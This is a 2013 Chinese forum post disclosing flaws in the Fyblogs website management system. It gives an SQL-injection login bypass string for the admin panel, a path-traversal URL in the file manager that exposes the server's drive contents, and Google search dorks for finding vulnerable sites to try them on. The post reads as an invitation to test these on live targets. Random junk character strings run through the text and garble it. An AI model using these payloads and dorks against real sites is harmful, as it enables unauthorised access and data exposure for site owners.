漏洞类型: 未授权访问/权限绕过6 v, c: o7 Y# I3 M
1 C( k; ^+ Y5 N" ^$ C0 f3 r简要描述:- @$ j- U! v' C
/ I0 U- |) \) c9 C ?3 \$ W
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!1 e1 c) P) m3 ?9 W: e
$ g2 t! E6 D' u& H) ]
详细说明:5 @5 r% O0 T- N8 V8 N
; r+ C. Y9 s$ [8 {! x
后台万能密码 'or'='or'1 t4 e& @: b4 E: ^2 }
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!9 B3 w1 Y5 D, ?' Z- ^
admin/uploadfile.asp?currentFolder=/upfiles/../
) q. {7 m: J& k, v; s9 J4 a3 y
7 H6 ^/ W/ A7 l0 h) Y: R漏洞证明:
. `9 o) i. Q7 F6 `/ I& p: s, o4 b, S/ k/ Z2 i8 G/ K5 e
谷歌:inurl:type.asp?id=1 新闻中心. h9 u s' D5 @0 y! l. {% t
或者 :inurl:download_ok.asp?) j' Z* {; O. D0 @3 m# W
" B! O$ c) J/ ?6 X* a5 m' j9 e+ |
可以测试/ \* C" B; i3 w3 b; [" M- k
0 E& J3 o/ b1 h1 H4 S. o# n: @1 m) i; s4 V, G
|
发表于 2013-3-7 13:07:46
收藏
支持
反对